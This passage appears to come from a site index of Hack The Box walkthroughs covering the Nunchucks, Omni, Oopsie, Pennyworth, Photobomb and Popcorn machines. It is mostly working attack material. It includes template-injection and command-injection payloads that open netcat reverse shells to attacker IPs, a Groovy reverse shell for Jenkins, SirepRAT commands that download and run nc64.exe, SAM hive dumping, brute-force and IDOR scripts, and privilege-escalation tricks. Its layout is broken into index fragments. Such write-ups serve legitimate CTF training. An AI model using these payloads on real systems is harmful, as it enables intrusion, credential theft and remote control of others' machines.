This blog post describes how we can exploit this vulnerability: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

    Basically, I'm using the following payloads:

```
{{range}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f')\")()}}
```

The last one is a reverse shell. Before running it in the Burp Suite Repeater, I've set up my netcat listener on port 1234.
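The probes can also be sent outside Burp. This is a sketch only: the endpoint and field name below are hypothetical (capture the real form submission and adjust both accordingly):

```python
# Sketch: post an SSTI probe to the email-collection form.
import requests

url = "https://store.nunchucks.htb/api/submit"  # hypothetical endpoint
payload = {"email": "{{range.constructor(\"return global.process"
                    ".mainModule.require('child_process')"
                    ".execSync('id')\")()}}@test.com"}
r = requests.post(url, json=payload, verify=False)
print(r.status_code, r.text)
```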

    ","tags":["walkthrough"]},{"location":"htb-nunchucks/#roots-flag","title":"Root's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#privileges-escalation","title":"Privileges escalation","text":"

    We'll abuse some process capability vulnerability to escalate to root. First we list processes capabilities:

    getcap -r 2>/dev/null\n

    Result:

    /usr/bin/perl = cap_setuid+ep\n/usr/bin/mtr-packet = cap_net_raw+ep\n/usr/bin/ping = cap_net_raw+ep\n/usr/bin/traceroute6.iputils = cap_net_raw+ep\n/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n

    We will use perl binary to escalate.

    echo -ne '#!/bin/perl \\nuse POSIX qw(setuid); \\nPOSIX::setuid(0); \\nexec \"/bin/bash\";' > pay.pl\nchmod +x pay.pl\n./pay.pl\n

    And you are root.

    ","tags":["walkthrough"]},{"location":"htb-omni/","title":"Walkthrough - Omni, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-omni/#about-the-machine","title":"About the machine","text":"data Machine Omni Platform Hackthebox url link OS Windows Difficulty Easy Points 20 ip 10.129.2.27","tags":["walkthrough"]},{"location":"htb-omni/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-omni/#enumeration","title":"Enumeration","text":"
    sudo nmap -sV -sC $ip -p-\n

    Results:

```
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
```

### Exploiting TCP 29817/29820

These ports can be exploited with SirepRAT.

```bash
# Testing for an existing file
python ~/tools/SirepRAT/SirepRAT.py $ip GetFileFromDevice --remote_path "C:\Windows\System32\drivers/etc/hosts" --v

# Place a nc64.exe file in the apache root server
sudo cp ~/tools/nc64.exe /var/www/html

# Start Apache server
sudo service apache2 start

# Upload nc64.exe: with SirepRAT, use cmd.exe on the victim's machine to launch a powershell
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\windows\system32\nc64.exe -uri http://10.10.14.2/nc64.exe'

# Open a listener on our attacker machine
rlwrap nc -lnvp 443

# Launch netcat on the victim's machine via SirepRAT
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\nc64.exe -e cmd 10.10.14.2 443'
```

    After browsing around we can see these interesting files:

    • C:\\Data\\Users\\administrator\\root.txt
    • C:\\Data\\Users\\app\\user.txt
    • C:\\Data\\Users\\app\\iot-admin.xml
      • C:\\Data\\Users\\app\\hardening.txt

    user.txt and root.txt \u00a0are PSCredential files with this format. To decrypt their passwords, we will need the user\u2019s password and the administrator's password. There are several approaches to obtain them:

    ","tags":["walkthrough"]},{"location":"htb-omni/#path-1-creds-in-a-file","title":"Path 1: creds in a file","text":"

    Evaluate all files until you get to C:\\Program Files\\WindowsPowershell\\Modules\\PackageManagement. Use powershell so you can run:

    ls -force\ntype r.bat\n

    Result:

```
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
```

### Path 2: Dump sam/system/security hives, extract hashes and crack them

    We will dump the SAM database to the attacker's machine. For that, first we will create a share in the attacker's machine:

```bash
# First create the share CompData on our attacker's machine
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username "username" -password "agreatpassword"

# After that, mount the share from the victim via SirepRAT (net use)
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\10.10.14.2\CompData /u:username agreatpassword'
```

    After that we can dump the hives: sam, system, and security:

```bash
# Now we will dump the hives we need. First, the SAM database
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\sam \\10.10.14.2\CompData\sam'

# Secondly, system
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\system \\10.10.14.2\CompData\system'

# Thirdly, security
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\security \\10.10.14.2\CompData\security'
```

From the attacker's machine, we can now use secretsdump.py to extract the hashes:

```bash
secretsdump.py -sam sam -security security -system system LOCAL
```

    From that we will obtain the following NTLM hashes:

```
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
```

    We can crack them with hashcat:

```bash
hashcat -m 1000 -O -a3 -i hashes.txt
```

### Exploiting TCP 8080

The credentials obtained for the users "app" and "administrator" are valid to log in to the portal that we observed previously on port 8080.

Log in as app, and go to the "Run Command" option.

    From the attacker's machine, get a terminal listening:

```bash
rlwrap nc -lnvp 443
```

    In the Run command screen, run:

    c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

    The listener will display the connection. Now:

```powershell
# Launch powershell
powershell

# Go to the app user's folder
cd C:\Data\Users\app

# Decrypt the PSCredential file
(Import-CliXml -Path user.txt).GetNetworkCredential().Password
```

As a result, you will obtain the user.txt flag.

## Get root.txt

Log out of the portal as user "app" and log in again as administrator.

    From the attacker's machine, get a terminal listening:

```bash
rlwrap nc -lnvp 443
```

    In the Run command screen, run:

    c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

    The listener will display the connection. Now:

```powershell
# Launch powershell
powershell

# Go to the administrator's folder
cd C:\Data\Users\administrator

# Decrypt the PSCredential file
(Import-CliXml -Path root.txt).GetNetworkCredential().Password
```

As a result, you will obtain the root.txt flag.

    ","tags":["walkthrough"]},{"location":"htb-oopsie/","title":"Oopsie - A Hack The Box machine","text":"
    nmap -sC -sV $ip -Pn\n
    Host is up (0.034s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)\n|   256 241da417d4e32a9c905c30588f60778d (ECDSA)\n|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)\n80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Welcome\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Open browser. From scripts called in home page you extract this path:

    <script src=\"/cdn-cgi/login/script.js\"></script>\n

Then you reach a login page that provides a way to log in as a guest.

Once logged in as a guest, pay attention to the cookies:

Now, in the browser, change id 2 to id 1 to see if data from another user is exposed.

    It is. Change the value of the cookies in the browser to be admin.

Upload a PHP reverse shell. I usually use the pentestmonkey one.

Now I use gobuster to enumerate possible locations for the upload:

```bash
gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20
```

```
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.95.191
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]
/themes               (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]
Progress: 87567 / 87665 (99.89%)
===============================================================
===============================================================
```

Nice, but as the admin user I cannot get into http://10.129.95.191/uploads/.

Is there any other user with more permissions? I will use Burp Suite Intruder to enumerate possible users through the insecure direct object reference on the id parameter. This would be the endpoint: http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=30. A scripted version of this enumeration is sketched below.
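A minimal sketch of the Intruder run with Python requests. The cookie values and the "valid account" marker are assumptions (use the guest cookies you observed in your own session and whatever string distinguishes a populated account page):

```python
# Sketch: walk the id parameter and flag responses that look like accounts.
import requests

url = "http://10.129.95.191/cdn-cgi/login/admin.php"
cookies = {"user": "2233", "role": "guest"}  # assumption: guest session cookies

for uid in range(1, 101):
    params = {"content": "accounts", "id": uid}
    body = requests.get(url, params=params, cookies=cookies).text
    if "@megacorp.com" in body:  # assumption: account pages expose an email
        print(uid, "looks like a valid account")
```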

User id 30 is super admin. With this I update my cookies, and now I'm able to access http://10.129.95.191/uploads/pentesmonkey.php. Before that, start a listener:

```bash
nc -lnvp 1234
```

# Pennyworth - A HackTheBox machine

```bash
nmap -sC -sV $ip -Pn -p-
```

Port 8080 is open, and from the browser we can see the login page of a Jenkins service. The version is not displayed.

Run this request through Burp Suite Intruder:

```
POST /j_spring_security_check HTTP/1.1
Host: 10.129.228.92:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://10.129.228.92:8080
Connection: close
Referer: http://10.129.228.92:8080/login?from=%2F
Cookie: JSESSIONID.4f24ed31=node0de80ew54idnc17ajfpe13p5hc0.node0
Upgrade-Insecure-Requests: 1

j_username=admin&j_password=!@#$%^&from=%2F&Submit=Sign+in
```

The payload position is the password parameter. You can use several dictionaries. For the sampled request, the response is a 500 response code with the Jenkins version visible in the footer:

```html
<div class="page-footer__links page-footer__links--white jenkins_ver"><a rel="noopener noreferrer" href="https://jenkins.io/" target="_blank">Jenkins 2.289.1</a></div>
```

The default credentials for the service (admin:password) don't work. By performing a brute-force attack with basic dictionaries, we find the valid credentials: root:password. A scripted version of this attack is sketched below.
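This is a minimal password-spraying sketch built on the same request Burp Intruder replayed. Treating a redirect away from /loginError as success is an assumption about Jenkins' login behaviour:

```python
# Sketch: spray passwords against the Jenkins form login.
import requests

url = "http://10.129.228.92:8080/j_spring_security_check"

with open("/usr/share/wordlists/rockyou.txt", encoding="latin-1") as wordlist:
    for line in wordlist:
        password = line.strip()
        data = {"j_username": "root", "j_password": password,
                "from": "/", "Submit": "Sign in"}
        r = requests.post(url, data=data, allow_redirects=False)
        # Assumption: failed logins redirect to /loginError.
        if "loginError" not in r.headers.get("Location", ""):
            print("valid credentials: root:" + password)
            break
```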

There is a nice repository for pentesting Jenkins, and I guess there might be several approaches and solutions to this machine. In my case, I used the Script Console provided by Jenkins with the following payload:

```groovy
String host="myip";
int port=1234;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

    After that:

```bash
whoami
cat /root/flag.txt
```

# Walkthrough - Photobomb, a Hack The Box machine

## About the machine

| Data | Value |
|------|-------|
| Machine | Photobomb |
| Platform | HackTheBox |
| Creator | slartibartfast |
| OS | Linux |
| Release date | 08 October 2022 |
| Difficulty | Easy |
| Points | 20 |
| IP | 10.10.11.182 |

## Recon

For the sake of convenience, we'll create a variable:

```bash
export ip=10.10.11.182
```

### Service/Port enumeration

Run nmap to enumerate open ports, services, OS, and traceroute.

First, a general scan, so as not to make too much noise:

```bash
sudo nmap $ip -Pn
```

Results:

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 12:34 EDT
Nmap scan report for 10.10.11.182
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Once you know the open ports, run nmap to see service versions and more details:

```bash
sudo nmap -sCV -p22,80 $ip
```

Results:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We open 10.10.11.182 in the browser. A redirection to http://photobomb.htb occurs, but the server is not found. So we add this mapping to our /etc/hosts file:

    We open the /etc/hosts file with an editor. For instance, nano.

```bash
sudo nano /etc/hosts
```

We move the cursor to the end and add this line:

```
10.10.11.182    photobomb.htb
```

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#directory-enumeration","title":"Directory enumeration","text":"

    We can use dirbuster to enumerate directories:

```bash
dirbuster
```

And we configure it to launch this dictionary: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

Results:

```
Dirs found with a 200 response:

/

Dirs found with a 401 response:

/printer/
/printers/
/printerfriendly/
/printer_friendly/
/printer_icon/
/printer-icon/
/printer-friendly/
/printerFriendly/
/printersupplies/
/printer1/


--------------------------------
Files found during testing:

Files found with a 401 response:

/printer
/printer.php
/printers.php
/printerfriendly.php
/printer_friendly.php
/printer_icon.php
/printer-friendly.php
/printerFriendly.php
/printersupplies.php
/printer1.php

Files found with a 200 response:

/photobomb.js
```

While we wait, we do a DNS enumeration:

### DNS enumeration

    Running:

```bash
nslookup
```

And after that:

```
> SERVER 10.10.11.182
```

Results:

```
Default server: 10.10.11.182
Address: 10.10.11.182#53
```

Then, we run:

```
> 10.10.11.182
```

And as a result, we have:

```
** server can't find 182.11.10.10.in-addr.arpa: NXDOMAIN
```
    So there is no result.

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#exploiting-the-login-page","title":"Exploiting the login page","text":"

    At http://photobomb.htb/printer we find a login page. Use Burp to capture the request of a failed login using \"username\" as username and \"password\" as a password.

    GET /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://photobomb.htb/\nUpgrade-Insecure-Requests: 1\nAuthorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=\n
    The authorization is the text \"username:password\" encoded in base64, which is known as Basic HTTP Authentication Scheme.
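We can verify this ourselves by decoding the captured value and re-encoding it:

echo 'dXNlcm5hbWU6cGFzc3dvcmQ=' | base64 -d   # -> username:password\necho -n 'username:password' | base64          # -> dXNlcm5hbWU6cGFzc3dvcmQ=\n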

After trying to brute-force the login page with different SecLists dictionaries, we decided to have a look at the only file with a 200 response in the directory enumeration, http://photobomb.htb/photobomb.js, and bingo! The user and password are there:

    function init() {\n  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me\n  if (document.cookie.match(/^(.*;)?\\s*isPhotoBombTechSupport\\s*=\\s*[^;]+(.*)?$/)) {\n    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');\n  }\n}\nwindow.onload = init;\n
We log in to the web with: + user: pH0t0 + password: b0Mb!

After entering the credentials, a panel to download images is displayed. Capturing the HTTP request to download an image with Burp Suite, we have:

    POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000\n

Playing with this request in Burp Suite's Repeater module, we can infer that the site is written in Ruby. Testing the three parameters in the request (photo, filetype, and dimensions), we discover that filetype is injectable: a ;-separated shell command appended to it gets executed. We can use either a Ruby reverse shell or a netcat one; Python doesn't work for us here. I go for an nc reverse shell and URL-encode it like this:

    POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 164\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.80+24444+>/tmp/f&dimensions=3000x2000\n
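URL-decoded, the injected filetype value is the classic mkfifo/netcat reverse shell one-liner:

png;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.80 24444 >/tmp/f\n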

Now, on the attacker machine (mine is 10.10.14.80), we listen on port 24444:

    nc -lnvp 24444\n
Once the attacker machine is listening, we go back to the Repeater module in Burp Suite and launch the attack with the SEND button. We obtain a reverse shell on the attacker machine.

    After that, we run:

    whoami\ncat /home/wizard/user.txt\n
    to get the user flag: *****

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#getting-the-system-flag","title":"Getting the system flag","text":"

    We run some basic commands:

    id\n
    Results:
    uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)\n
    echo $SHELL\n
    Results:
    /bin/bash\n
    uname -a\n
    Results:
    Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux\n
    sudo -l\n

    Results:

    Matching Defaults entries for wizard on photobomb:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser wizard may run the following commands on photobomb:\n    (root) SETENV: NOPASSWD: /opt/cleanup.sh\n

Two interesting things here: 1. the SETENV tag means our user can set environment variables when running the command through sudo, and 2. our user can execute /opt/cleanup.sh as root with no password. Having a look at the /opt/cleanup.sh file, we can see the command "find" invoked with a relative path:

    #!/bin/bash\n. /opt/.bashrc\ncd /home/wizard/photobomb\n\n# clean up log files\nif [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]\nthen\n  /bin/cat log/photobomb.log > log/photobomb.log.old\n  /usr/bin/truncate -s0 log/photobomb.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name '*.jpg' -exec chown root:root {} \\;\n
Knowing that we can set environment variables, we create an executable file named find in our home folder and prepend that folder to the $PATH passed to sudo. When /opt/cleanup.sh invokes its relative-path find, it runs our file instead, and we escalate to root.

    cd ~\necho bash > find\nchmod +x find\nsudo PATH=$PWD:$PATH /opt/cleanup.sh\n
    Now, we are root:

    id\n

    Results:

    uid=0(root) gid=0(root) groups=0(root)\n

    And the flag:

    cat root.txt\n
    Results: *******

    ","tags":["walkthrough"]},{"location":"htb-popcorn/","title":"Popcorn - A HackTheBox machine","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-usertxt","title":"Flag user.txt","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#reconnaissance","title":"Reconnaissance","text":"
    nmap -sC -sV -Pn 10.10.10.6 -p-\n

    Result:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)\n|_  2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)\n80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: Apache/2.2.12 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#enumeration","title":"Enumeration","text":"
    dirb http://10.10.10.6 /usr/share/wordlists/dirb/common.txt\n

    First result:

    ---- Scanning URL: http://10.10.10.6/ ----\n+ http://10.10.10.6/.bash_history (CODE:200|SIZE:320) \n+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)         + http://10.10.10.6/index (CODE:200|SIZE:177)            + http://10.10.10.6/index.html (CODE:200|SIZE:177)       + http://10.10.10.6/server-status (CODE:403|SIZE:291)    + http://10.10.10.6/test (CODE:200|SIZE:47330)           ==> DIRECTORY: http://10.10.10.6/torrent/                \n

Browsing to http://10.10.10.6/.bash_history gives a hint about how to escalate privileges later on:

It looks like someone exploited a Dirty COW vulnerability here.

    But let's browse the directory http://10.10.10.6/torrent/

    Browsing around we can identify a login page at http://popcorn.htb/torrent/login.php. This login page is vulnerable to SQLi.

We can use sqlmap to dump the users database:

    sqlmap --url http://popcorn.htb/torrent/login.php --data=\"username=lele&password=lalala\" -D torrenthoster -T users --dump --batch\n

    Here, someone created a user before me:

But since registration is open, we will create our own user to log in to the application.

Once you are logged in, browse around. There is a panel to upload your torrents.

Play with it. Uploading a reverse shell there is not allowed. But there is also another panel to edit an existing upload:

The screenshot file is not properly sanitized. Try to upload a pentestmonkey PHP reverse shell, capturing the request with Burp Suite. Modify the Content-Type header to "image/png" and...
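In the intercepted multipart request, the edited part looks roughly like this (the field name and file name here are illustrative, not the exact ones from the site):

Content-Disposition: form-data; name=\"screenshot\"; filename=\"shell.php\"\nContent-Type: image/png\n\n<?php /* pentestmonkey php-reverse-shell payload here */ ?>\n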

The reverse shell is uploaded. Get your netcat listening on port 1234 (or another port):

    nc -lnvp 1234\n

Click on the "Image File not Found" button and... bingo! You have a shell on your listener.

Spawn an interactive shell:

    python -c 'import pty; pty.spawn(\"/bin/bash\")'\n

Get the user's flag in /home/george/user.txt

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-roottxt","title":"Flag root.txt","text":"

From the previous user's .bash_history we know that this machine probably has a Dirty COW vulnerability. But first we can serve the LinPEAS script from our attacker machine to confirm.
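A minimal way to serve the script, assuming Python 3 is available on the attacker machine (run it from the directory containing linpeas.sh):

sudo python3 -m http.server 80\n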

Now, on the victim machine:

wget http://<attacker IP>/linpeas.sh\nchmod +x linpeas.sh\n./linpeas.sh\n

    Results:

    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Executing Linux Exploit Suggester\n\u255a https://github.com/mzet-/linux-exploit-suggester                                                                         \n[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson                                                                \n\n   Details: http://vulnfactory.org/exploits/full-nelson.c\n   Exposure: highly probable\n   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}\n   Download URL: http://vulnfactory.org/exploits/full-nelson.c\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04\n   Download URL: https://www.exploit-db.com/download/40611\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}\n   Download URL: https://www.exploit-db.com/download/40839\n   ext-url: https://www.exploit-db.com/download/40847\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2010-3904] rds\n\n   Details: http://www.securityfocus.com/archive/1/514379\n   Exposure: probable\n   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}\n   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c\n\n[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson\n\n   Details: https://www.exploit-db.com/exploits/17787/\n   Exposure: probable\n   Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}\n   Download URL: https://www.exploit-db.com/download/17787\n\n[+] [CVE-2010-1146] reiserfs\n\n   Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/\n   Exposure: probable\n   Tags: [ ubuntu=9.10 ]\n   Download URL: https://jon.oberheide.org/files/team-edward.py\n\n[+] [CVE-2010-0832] PAM MOTD\n\n   Details: https://www.exploit-db.com/exploits/14339/\n   Exposure: probable\n   Tags: [ ubuntu=9.10|10.04 ]\n   Download URL: https://www.exploit-db.com/download/14339\n   Comments: SSH access to non privileged user is needed\n\n[+] [CVE-2021-3156] sudo Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: mint=19,ubuntu=18|20, debian=10\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: 